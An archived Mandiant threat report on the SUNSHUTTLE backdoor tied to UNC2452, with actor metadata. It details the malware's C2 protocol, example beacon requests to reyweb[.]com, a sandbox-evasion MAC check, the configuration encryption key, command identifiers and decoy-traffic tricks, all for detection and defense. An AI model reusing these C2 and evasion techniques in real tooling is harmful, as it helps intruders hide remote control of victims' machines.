{
	"id": "f45e86a6-f77a-4d56-9432-4a22e7162e3c",
	"created_at": "2026-04-06T00:21:35.524313Z",
	"updated_at": "2026-04-10T03:37:32.543678Z",
	"deleted_at": null,
	"sha1_hash": "604ea5a293a9928c540dc64e412b79f90eb88bff",
	"title": "New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452 | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 616981,
	"plain_text": "New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting\r\nU.S.-Based Entity; Possible Connection to UNC2452 | Mandiant\r\nBy Mandiant\r\nPublished: 2021-03-04 · Archived: 2026-04-02 11:02:49 UTC\r\nWritten by: Lindsay Smith, Jonathan Leathery, Ben Read\r\nExecutive Summary\r\nIn August 2020, a U.S.-based entity uploaded a new backdoor that we have named SUNSHUTTLE to a\r\npublic malware repository.\r\nSUNSHUTTLE is a second-stage backdoor written in GoLang that features some detection evasion\r\ncapabilities.\r\nMandiant observed SUNSHUTTLE at a victim compromised by UNC2452, and have indications that it is\r\nlinked to UNC2452, but we have not fully verified this connection.\r\nPlease see the Technical Annex for relevant MITRE ATT\u0026CK techniques (T1027, T1027.002, T1059.003,\r\nT1071.001, T1105, T1140, T1573.001).\r\nThe activity discussed in this blog post is also detailed in a Microsoft blog post. We thank the team at Microsoft\r\nand other partners for their great collaboration in tracking this actor.\r\nThreat Detail\r\nMandiant Threat Intelligence discovered a new backdoor uploaded by a U.S.-based entity to a public malware\r\nrepository in August 2020 that we have named SUNSHUTTLE. SUNSHUTTLE is written in GO, and reads an\r\nembedded or local configuration file, communicates with a hard-coded command and control (C2) server over\r\nHTTPS, and supports commands including remotely uploading its configuration, file upload and download, and\r\narbitrary command execution. Notably, SUNSHUTTLE uses cookie headers to pass values to the C2, and if\r\nconfigured, can select referrers from a list of popular website URLs to help such network traffic “blend in.”\r\nThe SUNSHUTTLE backdoor file examined, “Lexicon.exe” (MD5: 9466c865f7498a35e4e1a8f48ef1dffd),\r\nwas written in GoLang. The file unpacks into MD5: 86e89349fefcbdd9d2c80ca30fa85511.\r\nThe infection vector for SUNSHUTTLE is not known. 
It is most likely a second-stage backdoor dropped\r\nafter an initial compromise.\r\nThe SUNSHUTTLE sample uses the actor-controlled server “reyweb[.]com” for C2. “Reyweb[.]com” is\r\nregistered anonymously via NameSilo, a domain provider who accepts bitcoin payment and has been used\r\nfor C2 registration by state-sponsored APTs in the past, including Russia-nexus actors and Iran-nexus APTs.\r\nMandiant observed SUNSHUTTLE at a victim compromised by UNC2452, and have indications that it is linked\r\nto UNC2452, but we have not fully verified this connection.\r\nhttps://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html\r\nPage 1 of 12\n\nPlease see FireEye’s resource center for background on UNC2452 and the SUNBURST campaign.\r\nOutlook and Implications\r\nThe new SUNSHUTTLE backdoor is a sophisticated second-stage backdoor that demonstrates straightforward but\r\nelegant detection evasion techniques via its “blend-in” traffic capabilities for C2 communications. SUNSHUTTLE\r\nwould function as a second-stage backdoor in such a compromise for conducting network reconnaissance alongside\r\nother SUNBURST-related tools.\r\nTechnical Annex\r\nMandiant Threat Intelligence discovered a sample of the SUNSHUTTLE backdoor uploaded to an online multi-Antivirus scan service. SUNSHUTTLE is a backdoor, written in GO, that reads an embedded or local\r\nconfiguration file, communicates with its C2 server over HTTPS and supports commands including remotely\r\nupdating its configuration, file upload and download, and arbitrary command execution.\r\nLexicon.exe (MD5: 9466c865f7498a35e4e1a8f48ef1dffd)\r\nC2: reyweb[.]com\r\nUNAVAILABLE (MD5: 86e89349fefcbdd9d2c80ca30fa85511)\r\nUnpacked version of 9466c865f7498a35e4e1a8f48ef1dffd\r\nInfection Vector\r\nFor the samples analyzed, the infection vector is not known.\r\nExecution\r\nExecution Summary\r\nSUNSHUTTLE is a backdoor written in GoLang. 
Once SUNSHUTTLE is executed, a high-level description of\r\nthe execution is the following:\r\nConfiguration settings determined\r\nRequest a “session key” from the C2\r\nRetrieve the “session key” from the C2\r\nOnce a session key is retrieved, SUNSHUTTLE begins command request beaconing loop\r\nBegin command request beaconing\r\nResolve command and perform action\r\nThe SUNSHUTTLE sample analyzed retains the names of the routines used by the malware, which include the\r\nfollowing:\r\nmain.request_session_key\r\nmain.define_internal_settings\r\nmain.send_file_part\r\nmain.clean_file\r\nmain.send_command_result\r\nmain.retrieve_session_key\r\nmain.save_internal_settings\r\nmain.resolve_command\r\nmain.write_file\r\nmain.beaconing\r\nmain.wget_file\r\nmain.fileExists\r\nmain.encrypt\r\nmain.decrypt\r\nmain.random\r\nmain.removeBase64Padding\r\nmain.addBase64Padding\r\nmain.delete_empty\r\nmain.Unpad\r\nmain.GetMD5Hash\r\nmain.Pad\r\nNote: Throughout the SUNSHUTTLE backdoor, unique string identifiers are used to indicate the operation being\r\nperformed to the C2 via a Cookie header, and unique string identifiers are also used to validate and parse response\r\ncontent from the C2. These unique string values are thought to be unique and random per compiled sample.\r\nInitial Execution\r\nOnce executed, the SUNSHUTTLE backdoor enumerates the victim’s MAC address and compares it to a\r\nhardcoded MAC address value “c8:27:cc:c2:37:5a”. If a match is found the backdoor exits. 
The MAC address is\r\nlikely a default MAC address for the Windows sandbox network adapter.\r\nFigure 1: Mac address check\r\nConfiguration\r\nIf the check is successful, the SUNSHUTTLE backdoor then enters a routine named\r\n“main_define_internal_settings”, which handles creation of the configuration file if one doesn’t already exist in\r\nthe directory from which SUNSHUTTLE is running. For the sample analyzed, the configuration filename is\r\n“config.dat.tmp”. The configuration data is Base64 encoded and AES-256 encrypted using the following key:\r\nhz8l2fnpvp71ujfy8rht6b0smouvp9k8\r\nThe configuration has the following example values when Base64 decoded and AES decrypted:\r\n48b9e25491e088a35105274cae0b9e67|5-\r\n15|0|0|TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NzUuMCkgR2V\r\nja28vMjAxMDAxMDEgRmlyZWZveC83NS4w\r\nThe configuration holds several values delimited by a “|” character, which are briefly described as follows.\r\n48b9e25491e088a35105274cae0b9e67\r\nMD5 hash of the current timestamp calculated during execution.\r\n5-15\r\nLower/upper limits used to randomly generate sleep times as SUNSHUTTLE executes\r\n0\r\n0 or 1 — Utilize “blend-in” traffic requests. 
Internally called “false_requesting”\r\n0\r\nActivate execution timestamp (0 by default) — execution \"activates\" or continues if current time is\r\ngreater than the value in the configuration\r\nTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NzUuMCkgR2Vja2\r\n8vMjAxMDAxMDEgRmlyZWZveC83NS4w\r\nBase64-encoded User-agent used in HTTPS requests\r\nDecoded: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nIf set in the configuration, the “blend-in” traffic occurs as the malware executes and transitions through its\r\nroutines. The following URLs are leveraged for the “blend-in” requests:\r\nhttps://reyweb[.]com/icon.ico\r\nhttps://reyweb[.]com/icon.png\r\nhttps://reyweb[.]com/script.js\r\nhttps://reyweb[.]com/style.css\r\nhttps://reyweb[.]com/css/style.css\r\nhttps://reyweb[.]com/css/bootstrap.css\r\nhttps://reyweb[.]com/scripts/jquery.js\r\nhttps://reyweb[.]com/scripts/bootstrap.js\r\nhttps://cdn.mxpnl[.]com/\r\nhttps://cdn.google[.]com/\r\nhttps://cdn.jquery[.]com/\r\nhttps://code.jquery[.]com/\r\nhttps://cdn.cloudflare[.]com/\r\nSession Key Mechanism\r\nSUNSHUTTLE performs initial requests to the C2 in order to request and then retrieve what it internally refers to\r\nas a session key. The retrieved session key from the C2 appears to be RSA decrypted using the following private\r\nkey that is embedded in SUNSHUTTLE and believed to be unique per compiled sample. 
Analysis is on-going on\r\nhow the decrypted session key is used, but it is likely a session key used to encrypt content once SUNSHUTTLE\r\ntransitions to its command-and-control routines.\r\nAfter the configuration is created or read from, SUNSHUTTLE enters a routine named\r\n“main_request_session_key”. The malware will iterate over this routine until it’s successful, sleeping a period of\r\ntime after each iteration.\r\nInside the “main_request_session_key” routine, SUNSHUTTLE constructs an HTTPS request to its configured\r\nC2. Upon an HTTP 200 response from the request, the response data from the C2 is expected to not contain the\r\nfollowing string for the sample analyzed:\r\nywQdjLuHHC\r\nThe request_session_key routine returns a 1 if the string is not in the response and a -1 if it is in the response. If\r\nthe result of the request_session_key is 1, SUNSHUTTLE will execute the retrieve_session_key routine.\r\nThe retrieve_session_key routine again contacts the C2 and downloads content that is expected to be decrypted by\r\nthe aforementioned embedded private key. The decrypted content is likely a session key used to encrypt content\r\nonce SUNSHUTTLE transitions to its command-and-control routines.\r\nCommanding\r\nOnce a session key is retrieved from the C2, SUNSHUTTLE begins the beaconing and “resolve_command”\r\nroutines in a loop. SUNSHUTTLE first issues a beacon to retrieve a command. After, SUNSHUTTLE will enter\r\nthe routine “resolve_command”, which parses the response content to determine which command should be run.\r\nAvailable commands include remotely updating its configuration, file upload and download, and arbitrary\r\ncommand execution.\r\nFigure 2: Resolve command graph\r\nThe content returned from the C2 after the “main_beaconing” routine is Base64 decoded and AES decrypted. 
A\r\ncheck is performed to ensure the decrypted content doesn’t contain the following string:\r\nCp5RTQ31R1\r\nAs noted, it is likely these strings are unique per sample and randomly generated at compilation.\r\nThe decrypted content is parsed for certain unique strings.\r\nUnique string in decrypted response Meaning\r\nzSsP2TSJJm3a Update sleep range — save config\r\naQJmWJzXdYK721mGBI3U Update “false requesting” value – save config\r\nW5VYP9Iu2uyHK Update C2 URL and User-agent – save config\r\n3487wD9t2OZkvqdwRpqPeE Send current timestamp to C2\r\nubFxROBRwfswVRWNjLC Update \"activation\" timestamp in the config — save config\r\nTMuhGdA9EHY Upload file to C2 if the file exists\r\n1kG4NaRX83BCMgLo38Bjq Execute command – return “EXECED” if successful\r\nhB0upT6CUmdRaR2KVBvxrJ Execute command – return results/output\r\nN/A (other string criteria met) Provides terminal command execution\r\nN/A (other string criteria met) Download file from C2\r\nFiles Dropped\r\nAfter successful execution of the malware, it drops the following files to the victim’s system:\r\n\\config.dat.tmp (MD5: Dynamic)\r\nEncrypted configuration file\r\nPersistence Method\r\nThe SUNSHUTTLE malware was not observed setting its own persistence. It is likely the persistence is set\r\noutside of the execution of SUNSHUTTLE.\r\nNetwork Communications\r\nSUNSHUTTLE uses the cookie header to pass values to the C2. Additionally, a referrer is selected from the\r\nfollowing list, presumably to make the traffic blend in if traffic is being decrypted for inspection:\r\nwww.bing.com\r\nwww.yahoo.com\r\nwww.google.com\r\nwww.facebook.com\r\nThe cookie headers vary slightly depending on the operation being performed. 
The following is an example\r\nrequest to the C2 from the “request_session_key” routine.\r\nVictim to C2\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=48b9e25491e088a35105274cae0b9e67; P5hCrabkKf=gZLXIeKI;\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www.facebook.com\r\nAccept-Encoding: gzip\r\nWithin the Cookie header, these values represent the following:\r\nHjELmFxKJc=48b9e25491e088a35105274cae0b9e67\r\nTimestamp MD5 contained within the configuration\r\nP5hCrabkKf=gZLXIeKI\r\n“P5hCrabkKf=” contains a unique string based on which routine is performing the request (see the\r\nfollowing table).\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx\r\n“i4zICToyI70Yeidf1f7rWjm5foKX2Usx” is hard coded within the SUNSHUTTLE backdoor. It\r\npossibly represents a payload identifier\r\nb7XCoFSvs1YRW=78\r\nUnknown purpose. 
This value is only included in request_session_key and retrieve_session_key\r\nrequests.\r\nAs mentioned, the cookie value “P5hCrabkKf=” contained in each request signifies the operation that is being\r\nperformed.\r\n“P5hCrabkKf=” Cookie Value Meaning\r\ngZLXIeK main_request_session_key\r\ndo1KiqzhQ main_clean_file\r\nt5UITQ2PdFg5 main_wget_file\r\ncIHiqD5p4da6OeB main_retrieve_session_key\r\nxpjQVt3bJzWuv main_send_file_part\r\nS4rgG1WifHU main_send_command_result\r\nAfter successful installation / initialization of the malware, it proceeds to make the following callback to the C2\r\nserver reyweb[.]com via TCP/443 HTTPS:\r\nVictim to C2\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=48b9e25491e088a35105274cae0b9e67; P5hCrabkKf=gZLXIeKI;\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www.facebook.com\r\nAccept-Encoding: gzip\r\nVictim to C2\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=48b9e25491e088a35105274cae0b9e67; P5hCrabkKf=gZLXIeKI;\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www.yahoo.com\r\nAccept-Encoding: gzip\r\nAdditionally, if the “fake_requesting” configuration value is set to 1, SUNSHUTTLE will generate traffic meant\r\nto blend in with real traffic. 
Examples of those requests are as follows:\r\nVictim to C2\r\nGET /icon.png HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nReferer: www.google.com\r\nAccept-Encoding: gzip\r\nVictim to C2\r\nGET /css/style.css HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nReferer: www.facebook.com\r\nAccept-Encoding: gzip\r\nVictim to C2\r\nGET /css/bootstrap.css HTTP/1.1\r\nHost: reyweb[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nReferer: www.facebook.com\r\nAccept-Encoding: gzip\r\nVictim to Legitimate\r\nGET / HTTP/1.1\r\nHost: cdn.cloudflare[.]com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nReferer: www.google.com\r\nAccept-Encoding: gzip\r\nAppendix: MITRE ATT\u0026CK Framework\r\nTechnique Description\r\nT1027 Obfuscated Files or Information\r\nT1027.002 Software Packing\r\nT1059.003 Windows Command Shell\r\nT1071.001 Web Protocols\r\nT1105 Ingress Tool Transfer\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1573.001 Symmetric Cryptography\r\nAppendix: Detecting the Techniques\r\nFireEye security solutions provide detection of the SUNSHUTTLE activity across email, endpoint and network\r\nlevels. 
The following is a snapshot of existing detections related to activity outlined in this blog post.\r\nPlatform(s) Detection Name\r\nNetwork Security\r\nEmail Security\r\nDetection On Demand\r\nMalware File Scanning\r\nMalware File Storage Scanning\r\nFE_APT_Backdoor_Win64_SUNSHUTTLE_1\r\nFE_APT_Backdoor_Win_SUNSHUTTLE_1\r\nAPT.Backdoor.Win.SUNSHUTTLE\r\nAPT.Backdoor.Win.SUNSHUTTLE.MVX\r\nEndpoint Security\r\nMalware Protection (AV/MG)\r\nTrojan.GenericKD.34453763\r\nGeneric.mg.9466c865f7498a35\r\nSource: https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html"
	],
	"report_names": [
		"sunshuttle-second-stage-backdoor-targeting-us-based-entity.html"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434895,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/604ea5a293a9928c540dc64e412b79f90eb88bff.pdf",
		"text": "https://archive.orkl.eu/604ea5a293a9928c540dc64e412b79f90eb88bff.txt",
		"img": "https://archive.orkl.eu/604ea5a293a9928c540dc64e412b79f90eb88bff.jpg"
	}
}